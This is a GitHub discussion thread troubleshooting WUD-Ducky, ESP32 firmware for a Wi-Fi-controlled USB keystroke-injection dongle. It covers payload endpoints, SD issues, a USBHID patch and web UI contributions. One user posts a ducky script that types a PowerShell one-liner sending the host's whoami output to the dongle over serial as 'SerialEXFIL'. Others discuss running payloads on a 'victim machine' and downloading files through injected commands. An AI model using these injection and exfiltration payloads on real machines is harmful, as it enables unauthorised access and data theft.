### DISCUSSION TITLE
Troubleshooting issues

### DISCUSSION THREAD

**Discussion by m00nbyt3** [tobozo/WUD-Ducky#7] [General]
After trying flashing in 5 diferent SD cards, it was impossible for me to be able to make my WUD work. When I create or modify any file directly form Windows, the SD randomly crash and it can be used again till I flash the ino again. 
Also, I dont know hot to send commands via key or runpayload, it keeps saying FileNotFound or MISSING ARGS, no matter what I write in the endpoint.
I think theres a litte bit of info measing, something like a setup and first use tutorial should be added to the redme, if not users with no such a big experience as me will be a bit lost and frustrated.

**Comment by tobozo** [comment]
hey @m00nbyt3 thanks for your feedback.

I understand debugging on a USB dongle without serial console can be frustrating.
Luckily it's also a good study for practising troubleshooting skills (and in my case excercising patience) so we're not at a total loss :wink: 

[FileNotFound](https://github.com/tobozo/WUD-Ducky/search?q=FileNotFound): forgot to upload SPIFFS ?

[MISSING ARGS](https://github.com/tobozo/WUD-Ducky/search?q=MISSING+ARGS): it's probably a consequence of the previous problem (missing files in SPIFFS).

**Comment by j1t077** [comment]
At first I pass as the partner m00nbyt3. Then download the modified fork I uploaded it without problems. The windows to which I connect the WUD-Ducky and recognizes it as keyboard (HID), as SD card and creates the Wifi WUD-01. But when I run a Payload it tells me "NOT FOUND". What am I doing wrong? Do you have to put any command before the Payload? Assuming I have it at the root of the SD card, it would run like this: http://192.168.4.1/payload.txt 
??
Sorry for my bad English, I had to use google translate

Thanks.

**Comment by tobozo** [comment]
hello

Payload filename on the SD card *must* contain `quack` e.g. `quack_blah.txt` or `my_payload_quack.txt`.

https://github.com/tobozo/WUD-Ducky/blob/main/data/index.htm#L110

Sorry about the minimalist web UI, contributions are welcome :-)

**Comment by j1t077** [comment]
Thanks a lot.

Thanks a lot. While waiting for an answer I read the code and saw a "quack", and I understood that it was in the address bar, but I could not find how to use it. 

Thank you for your reply. When the holidays are over, I'll wear it again. Happy holidays to all. P.S: I hope to have some useful ideas and to be able to contribute to this project. 

Thank you very much for your effort.

**Comment by j1t077** [comment]
Then this would be the execution: http://192.168.4.1/runpayload?file=quack_payload.txt 

But the txt is correct? It wouldn't be a.bin

**Comment by tobozo** [comment]
I'm not sure what you mean with `.bin`, ducky scripts are in txt format [as in the example](https://github.com/tobozo/WUD-Ducky/blob/main/duckyscripts/run_calc.quack.txt).

**Comment by j1t077** [comment]
Sorry, it was my mistake, I have other types of usb that work with.bin files. 

In the end I couldn't hold on and I tried what you tell me. 

It works like this: http://192.168.4.1/runpayload?file=/run_notepad.quack.txt If we do not put the "/" always gives us error "FILE NOEXISTS".

 And if they try to run it like this: http://192.168.4.1/runpayload/run_notepad.quack.txt the error it gives us is "FileNotFound. 

So the right way to execute them is: http://192.168.4.1/runpayload?file=/run_notepad.quack.txt
 or if you have them in folders it would be: http://192.168.4.1/runpayload?file=/FOLDER/run_notepad.quack.txt

Thank you very much for your help. I hope this will help the other people who are looking for a solution to this.

**Comment by j1t077** [comment]
I forget, to send the keystrokes is like this: http://192.168.4.1/key?=Keystrokes_to_send

**Comment by Compr0mzd** [comment]
I tried everything but couldn't make it to work. The WEB UI was recognizing the file in the flash but each time the SD card was plugged i couldn't see the content of it.

**Comment by GippokratOA** [comment]
Hi, I tried to work with this back in November, but I stopped at the point that I could not figure out how to run a payload. Now I can see that new comments have appeared here. I tried solutions from j1t077 but it doesn't work for me. It's just that "/ name_of_payload" appears in the browser window, and nothing happens on the target PC. May be I'm an idiot and do something wrong?
![image](https://user-images.githubusercontent.com/51450242/148388979-41d1e92e-2c7f-4990-8f0d-af4011bef45e.png)

**Comment by GippokratOA** [comment]
The same happens with keystrokes

**Comment by tobozo** [comment]
hi everyone on this thread, sorry about the minimalistic web UI and the code mess.

Indeed the current configuration has a few issues and unintuitive behaviours, and the lack of debug interface can be very frustrating.

Good news is the espressif sdk has matured and most USB examples are now working, so I'll try to rewrite the whole app using the official USB library coming with arduino-esp32-2.0.2.

The MSC implementation may be a bit slower, but it will allow to introduce absolute mouse positioning via ducky scripts.

This has been quite successful so far, here's the WUD-Ducky drawing a space invaders in paint:

https://user-images.githubusercontent.com/1893754/148417473-649a63f4-84ae-4d28-b17f-4400aba870f1.mp4

Sooo the web UI needs to be improved but with all those upcoming task I don't have any time left for that, if any of you's want to contribute to the HTML/JS part it'll be warmly welcome :-)

@GippokratOA seeing the file name in your browser tab means that the ducky script was executed successfully, the one you ran is for KDE/Linux and hasn't been tested elsewhere, maybe you're on Windows or MacOS and this is why it had no effect ?

**Comment by GippokratOA** [comment]
Well, i tried it on windows.. but what about "key"? It doesn't work for me too. Tomorrow I'll try it on my linux laptop and write about result.

**Comment by GippokratOA** [comment]
Nope, it doesn't work on linux. Something can be wrong with my esp32. I thought about this because in my windows device manager this device doesn't determined as hid device. It looked like i have no driver.

**Comment by tobozo** [comment]
I've pushed the ongoing work on a [new branch](https://github.com/tobozo/WUD-Ducky/tree/arduino-esp32-2.0.2), 
Web UI allows to switch from SD to SPIFFS, but everything related to the ducky script interpretor is currently broken.

Good news is it's not necessary to use the magnet anymore to flash the device while in debug mode so it'll be faster to test fix tomorrow.

**Comment by GippokratOA** [comment]
Hey, with new branch, my device has finally appeared in "hid devices". I see duck icons in ducky scripts name. That's a great idea. Hope you'll fix the interpretor.

**Comment by tobozo** [comment]
It's becoming more stable on the new branch now.

Most internal functionalities are now translated to ducky commands (Serial.begin, WiFi.begin, etc), so don't panic if you the setup() looks a bit weird :-)

But there are two nasty bugs with the libraries bundled with arduino SDK 2.0.2, one with SD, and the other with HID.

Fixing the SD issue can be done by applying [this PR](https://github.com/espressif/arduino-esp32/pull/6103/files) ~~removing [those lines](https://github.com/espressif/arduino-esp32/commit/f32c0da7e2e8336c05171cf312541369b45737f2)~~.

Fixing the HID requires to modify `USBHID::SendReport` in [USBHID.cpp](https://github.com/espressif/arduino-esp32/blob/master/libraries/USB/src/USBHID.cpp#L343), the changes are just before the return statement : 

```C++
bool USBHID::SendReport(uint8_t id, const void* data, size_t len, uint32_t timeout_ms){
    if(!tinyusb_hid_device_input_sem || !tinyusb_hid_device_input_mutex){
        log_e("TX Semaphore is NULL. You must call USBHID::begin() before you can send reports");
        return false;
    }

    if(xSemaphoreTake(tinyusb_hid_device_input_mutex, timeout_ms / portTICK_PERIOD_MS) != pdTRUE){
        log_e("report %u mutex failed", id);
        return false;
    }

    bool res = ready();
    if(!res){
        log_e("not ready");
    } else {
        res = tud_hid_n_report(0, id, data, len);
        if(!res){
            log_e("report %u failed", id);
        } else {
            xSemaphoreTake(tinyusb_hid_device_input_sem, 0);
            if(xSemaphoreTake(tinyusb_hid_device_input_sem, timeout_ms / portTICK_PERIOD_MS) != pdTRUE){
                log_e("report %u wait failed", id);
                res = false;
            }
        }
    }
    xSemaphoreGive(tinyusb_hid_device_input_mutex);
    if (tinyusb_hid_device_input_sem) {
        xSemaphoreGive(tinyusb_hid_device_input_sem);
    }
    return res;
}
```

**Comment by GippokratOA** [comment]
Eh( Now web ui doesnt work. 192.168.4.1 hasn't  open ports.

**Comment by tobozo** [comment]
Using those settings will spare you from using the magnet when flashing, and also enable the Serial console:
 
![image](https://user-images.githubusercontent.com/1893754/148812066-92b83180-172e-4eff-8de7-f0e2dd7adc77.png)

Issuing the "logs" Serial command will tell you what's wrong, in this screenshot the SD Card fails to load, so the filesystem defaults to SPIFFS (the host OS waits forever for a disk that isn't there), a common symptom after flashing the ESP, fixed by a power cycle.

![image](https://user-images.githubusercontent.com/1893754/148812373-f6fb2041-d2b3-4dd3-9554-e6bd139d65f6.png)

**Comment by GippokratOA** [comment]
Oh my gosh! It is finally works! /key and /runpayload worked perfectly on my windows laptop!

**Comment by GippokratOA** [comment]
Hey, is it possible to make it typing faster now?

**Comment by GippokratOA** [comment]
Oh, I found it in "Payload_runner.h" and set "int keyDelay = 2". Now it types fast enough.

**Comment by GippokratOA** [comment]
And one more question. How can I write a code do press for example "win + r"?

**Comment by tobozo** [comment]
> set "int keyDelay = 2". Now it types fast enough.

`KeyDelay:2` ducky command should work?

>  How can I write a code do press for example "win + r"?

HID_KEY_GUI_LEFT is 227, and KEY_R is 114 so that would be: `Press:227+114`

I've asked @spacehuhn permission to re-use the [keyboard layouts](https://github.com/SpacehuhnTech/WiFiDuck/tree/master/atmega_duck) and eventually match the [ducky syntax](https://github.com/SpacehuhnTech/WiFiDuck/blob/master/atmega_duck/duckparser.cpp#L39) from WiFiDuck, but I need to solve other problems first e.g. the OS 'spinning' the disk forever when the SD fails to load or isn't present.

**Comment by GippokratOA** [comment]
> HID_KEY_GUI_LEFT is 227, and KEY_R is 114 so that would be: Press:227+114

> 

Nope, it doesn't work for me. I also tryed `Key:227+114` but there only windows bar appeared.

**Comment by tobozo** [comment]
from what I've understood `Key` does not do shortcuts, only `Press` does that.

Maybe the issue is with using `Keyboard.pressRaw` instead of `Keyboard.press`, or with using `Keyboard.releaseAll` instead of releasing keys separately, or even with the hardcoded 25ms delay between press and release. 

I'll experiment with that as soon as I solve that mystery with the SD.

**Comment by GippokratOA** [comment]
There is one more problem.. I can't print some text that contains `:`. So i can't download files with powershell or cmd. May be there is some code of `:` button? Like enter has code 40.

**Comment by j1t077** [comment]
> Hi, I tried to work with this back in November, but I stopped at the point that I could not figure out how to run a payload. Now I can see that new comments have appeared here. I tried solutions from j1t077 but it doesn't work for me. It's just that "/ name_of_payload" appears in the browser window, and nothing happens on the target PC. May be I'm an idiot and do something wrong? ![image](https://user-images.githubusercontent.com/51450242/148388979-41d1e92e-2c7f-4990-8f0d-af4011bef45e.png)

If you run it as I have put it works. If it does not work for you, see that the Script is for the Operating System in which you want things to sweat.

Run like this:

http://192.168.4.1/runpayload?file=/run_notepad.quack.txt
http://192.168.4.1/runpayload?file=/FOLDER/run_notepad.quack.txt
http://192.168.4.1/key?=Keystrokes_to_send

**Comment by j1t077** [comment]
> There is one more problem.. I can't print some text that contains `:`. So i can't download files with powershell or cmd. May be there is some code of `:` button? Like enter has code 40.

Do you enclose the "." or ":" in quotation marks?

**Comment by j1t077** [comment]
> > There is one more problem.. I can't print some text that contains `:`. So i can't download files with powershell or cmd. May be there is some code of `:` button? Like enter has code 40.
> 
> Do you enclose the "." or ":" in quotation marks?

for example, for a powershell it would be like this:

DefaultDelay:50
CustomDelay:3000
Press:227
CustomDelay:1000
PrintLine:powershell
CustomDelay:1000
PrintLine:$s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'\(([^\)]+)\)').Groups[1].Value; $cmd=whoami; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$cmd"); $port.Close(); exit;

**Comment by j1t077** [comment]
> > > There is one more problem.. I can't print some text that contains `:`. So i can't download files with powershell or cmd. May be there is some code of `:` button? Like enter has code 40.
> > 
> > 
> > Do you enclose the "." or ":" in quotation marks?
> 
> for example, for a powershell it would be like this:
> 
> DefaultDelay:50 CustomDelay:3000 Press:227 CustomDelay:1000 PrintLine:powershell CustomDelay:1000 PrintLine:$s=(Get-WmiObject -Class Win32_PnPEntity -Namespace "root\CIMV2" -Filter "PNPDeviceID like 'USB\VID_1b4f&PID_9208%'").Caption; $com=[regex]::match($s,'(([^\)]+))').Groups[1].Value; $cmd=whoami; $port= new-Object System.IO.Ports.SerialPort $com,38400,None,8,one; $port.open(); $port.WriteLine("SerialEXFIL:$cmd"); $port.Close(); exit;


Consider the keyboard language

**Comment by j1t077** [comment]
For a PowerShell here I leave you an idea>

CustomDelay:500
Rem: press HID_KEY_GUI_LEFT (left meta 'windows' key)
Key:227
Print: execute
Rem: press HID_KEY_ENTER / HID_KEY_RETURN ( 40 / 158 )
Key:158
Key:40
CustomDelay:500
PrintLine: powershell
CustomDelay:500
Print:Get-ChildItem
Rem: press HID_KEY_ENTER / HID_KEY_RETURN ( 40 / 158 )
Key:158
Key:40

**Comment by GippokratOA** [comment]
Ah.. may be you can show me how to downlaod file through cmd or powershell on the example of this picture?
https://i1.aprbrother.com/wud-1.jpg

**Comment by j1t077** [comment]
> Hi, I tried to work with this back in November, but I stopped at the point that I could not figure out how to run a payload. Now I can see that new comments have appeared here. I tried solutions from j1t077 but it doesn't work for me. It's just that "/ name_of_payload" appears in the browser window, and nothing happens on the target PC. May be I'm an idiot and do something wrong? ![image](https://user-images.githubusercontent.com/51450242/148388979-41d1e92e-2c7f-4990-8f0d-af4011bef45e.png)
That Script is for KDE, it says in the comments of the Script.

**Comment by j1t077** [comment]
> Ah.. may be you can show me how to downlaod file through cmd or powershell on the example of this picture? https://i1.aprbrother.com/wud-1.jpg

Working on it, since I use Keyboard in Spanish and I need to be changing things to make them work for me.

**Comment by j1t077** [comment]
> There is one more problem.. I can't print some text that contains `:`. So i can't download files with powershell or cmd. May be there is some code of `:` button? Like enter has code 40.

You are right. I have tried the new version and the old one, and in the 2 it gives the same problem with ": ", when reaching the ": "it makes a line jump and does not continue. It is as if it detects that it is final text and enter. In addition another error that I think is discussed above, is that the SD card is not displayed on the PC that is connected, only on the WEB.

**Comment by j1t077** [comment]
> It's becoming more stable on the new branch now.
> 
> Most internal functionalities are now translated to ducky commands (Serial.begin, WiFi.begin, etc), so don't panic if you the setup() looks a bit weird :-)
> 
> But there are two nasty bugs with the libraries bundled with arduino SDK 2.0.2, one with SD, and the other with HID.
> 
> Fixing the SD issue can be done by applying [this PR](https://github.com/espressif/arduino-esp32/pull/6103/files) ~removing [those lines](https://github.com/espressif/arduino-esp32/commit/f32c0da7e2e8336c05171cf312541369b45737f2)~.
> 
> Fixing the HID requires to modify `USBHID::SendReport` in [USBHID.cpp](https://github.com/espressif/arduino-esp32/blob/master/libraries/USB/src/USBHID.cpp#L343), the changes are just before the return statement :
> 
> ```c++
> bool USBHID::SendReport(uint8_t id, const void* data, size_t len, uint32_t timeout_ms){
>     if(!tinyusb_hid_device_input_sem || !tinyusb_hid_device_input_mutex){
>         log_e("TX Semaphore is NULL. You must call USBHID::begin() before you can send reports");
>         return false;
>     }
> 
>     if(xSemaphoreTake(tinyusb_hid_device_input_mutex, timeout_ms / portTICK_PERIOD_MS) != pdTRUE){
>         log_e("report %u mutex failed", id);
>         return false;
>     }
> 
>     bool res = ready();
>     if(!res){
>         log_e("not ready");
>     } else {
>         res = tud_hid_n_report(0, id, data, len);
>         if(!res){
>             log_e("report %u failed", id);
>         } else {
>             xSemaphoreTake(tinyusb_hid_device_input_sem, 0);
>             if(xSemaphoreTake(tinyusb_hid_device_input_sem, timeout_ms / portTICK_PERIOD_MS) != pdTRUE){
>                 log_e("report %u wait failed", id);
>                 res = false;
>             }
>         }
>     }
>     xSemaphoreGive(tinyusb_hid_device_input_mutex);
>     if (tinyusb_hid_device_input_sem) {
>         xSemaphoreGive(tinyusb_hid_device_input_sem);
>     }
>     return res;
> }
> ```

Should those lines be replaced or added?

**Comment by j1t077** [comment]
> hi everyone on this thread, sorry about the minimalistic web UI and the code mess.
> 
> Indeed the current configuration has a few issues and unintuitive behaviours, and the lack of debug interface can be very frustrating.
> 
> Good news is the espressif sdk has matured and most USB examples are now working, so I'll try to rewrite the whole app using the official USB library coming with arduino-esp32-2.0.2.
> 
> The MSC implementation may be a bit slower, but it will allow to introduce absolute mouse positioning via ducky scripts.
> 
> This has been quite successful so far, here's the WUD-Ducky drawing a space invaders in paint:
> draw_invader.mp4
> 
> Sooo the web UI needs to be improved but with all those upcoming task I don't have any time left for that, if any of you's want to contribute to the HTML/JS part it'll be warmly welcome :-)
> 
> @GippokratOA seeing the file name in your browser tab means that the ducky script was executed successfully, the one you ran is for KDE/Linux and hasn't been tested elsewhere, maybe you're on Windows or MacOS and this is why it had no effect ?

Good morning Tobozo. 

How can I contribute to the project? 
I have a Web interface practically finished and working. How should I do to integrate it into the project? 
I'm using the second version of your project. And where I should put my contribution in the archive, and how I should put it. I haven't programmed for 10 years and it's the first time I'd be involved in anything. Thanks very much.

**Comment by tobozo** [comment]
@j1t077 apologies for the late answer and thanks for offering your contribution

The contents from the index.html file has been moved into the `index.h` file so it can never be accidentally overwritten by SPIFFS operations.

The declaration is currently using some kind of heredoc syntax (don't know the exact name), I did this because I was becoming lazy to upload both the sketch and the data folder on every iteration. 

Random thought: if the index.hml size exceeds 16KB we'll have to think about gzipping it..


```C
const char* index_html = R"indexHTML(

<!-- put your HTML code here -->

)indexHTML";

```

Any other asset should be left in the /data folder and uploaded to SPIFFS with arduino sketch data uploader utility.

Whenever you're satisfied with the results, just commit the changes to the secondary branch on your fork and submit a pull request, then we'll discuss the changes in the PR comments section before merging.

**Comment by j1t077** [comment]
Tobozo. Step by step you could tell me how I do it. Thanks a lot.

**Comment by j1t077** [comment]
Tell me if the FORK has been successfully uploaded. if not you will have to tell me how I upload it. Thanks a lot.

**Comment by tobozo** [comment]
@j1t077 I can see the new branch on your fork, but github won't let me merge.

![image](https://user-images.githubusercontent.com/1893754/150331372-265b00a9-7e7e-4f9a-8a34-a7316cf5d831.png)

Let's try the other way.

**Apply the following steps on your own `esp32-2.0.2` branch** ( https://github.com/j1t077/WUD-Ducky/tree/arduino-esp32-2.0.2 )

For each non binary file you modified:

- Open the file in editing mode from the web UI (e.g. [edit index.h](https://github.com/j1t077/WUD-Ducky/edit/arduino-esp32-2.0.2/index.h) )
- paste your new code
- scroll down
- give a description to your commit (e.g. "Added CSS directives")
- click on "propose changes"

![image](https://user-images.githubusercontent.com/1893754/150334307-34342202-7177-4605-af68-b1ded91b474c.png)

For each binary file you modified (e.g. favicons):

- delete the file
- re-upload it using the "upload files" dropdown menu

![image](https://user-images.githubusercontent.com/1893754/150334520-1f25f4a4-e0e3-47b5-9d37-a9ed05227f98.png)

I understand it can be a struggle to use git, so I can eventually import your changes manually, but I don't like doing that as it removes the contributor from history.

**Comment by j1t077** [comment]
Tanks Tobozo.

I think it's already uploaded correctly. I have another question. as I delete the FORK of version 1, which I do not understand why it went up like this. Or you have to leave it at that.?

**Comment by j1t077** [comment]
I forgot. In kali linux it detects the SD card and you can upload files and run the Scripts from it. I imagine on other Linux OS as well. But ": "end the command.
 For example: if we say to write an address: https://xxxxxx.xxx when you finish typing https, it breaks the line and finishes the command, it does not write the rest.

**Comment by tobozo** [comment]
thanks for your contribution :+1:  

you can safely delete your fork now that the changes have been merged

I can reproduce the `:` and `Press` issues, `strtok_r` is probably a bad choice and the payload runner needs improvements.

The implementation of all ducky commands from spacehuhn's project should solve that, but it's sill a work in progress.

**Comment by j1t077** [comment]
Thank you very much Tobozo. In case of making more changes I will notify you to see if they can be implemented.

At the moment I will try to translate all the key codes and upload it here in the discussion if you allow me.

**Comment by tobozo** [comment]
[last commit](https://github.com/tobozo/WUD-Ducky/commit/2a99cd5ecab638030a560ec381055aa75fc0e247) on the secondary branch broke and fixed a few things.

The WUD is now using SpaceHuhn's ducky syntax, including the existing keyboard mappings.

I probably also made index.h uglier after trying to fix some unclosed tags (wouldn't validate at https://validator.w3.org/), sorry about that.

Most HID functionalities have only been partially tested and the PenDrive should work as r/w from the host side and readonly from the ESP side.

This is still a work in progress though.

**Comment by j1t077** [comment]
Hello Tobozo. I've been testing the new version with spacehunh's syntaxis, but it doesn't do anything (at least it happens to me) and I don't know if I'm writing the payloads wrong. 

On the web it loads correctly but does not run on the victim machine, as if it did not run. 

I tried this one: 

DEFAULTDELAY 200
GUI
STRING kwrite
ENTER
STRING Hello World!

**Comment by tobozo** [comment]
Hello @j1t077 

I tried [this windows test script](https://github.com/tobozo/WUD-Ducky/blob/arduino-esp32-2.0.2/duckyscripts/quack.testWindows.txt) last night from a linux desktop and most commands were echoed in my already opened text editor.

That's not a fully valid test though, maybe something in there didn't work (could be with the key names?).

I'm currently working on web UI improvements, so I'll test your snippet in my next task.

Now that I've added mDNS and WiFiAP tools to the WUD-Ducky, the development flow of the web UI is much easier.

I'll be adding a free form to send out payloads from a textarea.

Pasting ducky code from a browser running on the same machine the WUD is connected to isn't a realistic scenario but will be possible and will certainly ease the testing.

# Last changes

Since last night, using the new commands `SetSSID_STA` and `SetPassword_STA`  will make the WUD join your WiFi network on next reboot and have the webUI available at http://wud-nutquacker.local/ or http://wud-nutquacker.localdomain/

There's also a new web endpoint `/info`, with its `SysInfo` commandline counterpart.

![image](https://user-images.githubusercontent.com/1893754/151353067-c319b732-bd84-4b0a-9856-615cdc5e7637.png)

![image](https://user-images.githubusercontent.com/1893754/151353089-a64ee971-5859-4bb1-81f1-cc21ef3c74d3.png)

![image](https://user-images.githubusercontent.com/1893754/151353491-78bde5f6-68c0-4326-875c-dafd5aab4390.png)

**Comment by tobozo** [comment]
[**[update](https://github.com/tobozo/WUD-Ducky/commit/bd29932003b036bf3edc9486030ec2f92345df5b)**]

tl;dr: improved WebUI with `Quack` button, merged PWA with settings & info page, dropped SPIFFS for LittleFS and fixed a few bugs.

![image](https://user-images.githubusercontent.com/1893754/152597478-f3df8303-8d31-4706-912f-1962bb993f5a.png)


![image](https://user-images.githubusercontent.com/1893754/152597557-8931aec6-661e-4e75-af0c-1b4887861ff0.png)

![image](https://user-images.githubusercontent.com/1893754/152597610-45348faf-9594-4dcb-8a73-289b5bbf8cfa.png)

**Comment by tobozo** [comment]
converting this issue to a discussion since a few things now appear to work properly :-)

**Comment by Chuckletech** [comment]
is it possible to implement folder browsing from the webui???

**Reply by tobozo** [reply]
There used to be folder browsing in a previous version but I kinda broke it when rewriting the code base so the code isn't there anymore, but the logic is still there and it shouldn't be a problem to implement it.

I'm already busy on other projects and can't switch contexts, but implementing shouldn't be too difficult.

There's a function `contentFound()` in `WiFiDuck/WebServer.cpp` where the trailing slash is currently ignored, this is where folders were handled before I broke it :blush: , this block just needs to call the currently unused `handleFileList()` function.

![image](https://user-images.githubusercontent.com/1893754/172041549-6a581f38-7093-4280-b75f-79f14012cf7e.png)

happy hacking :wink:
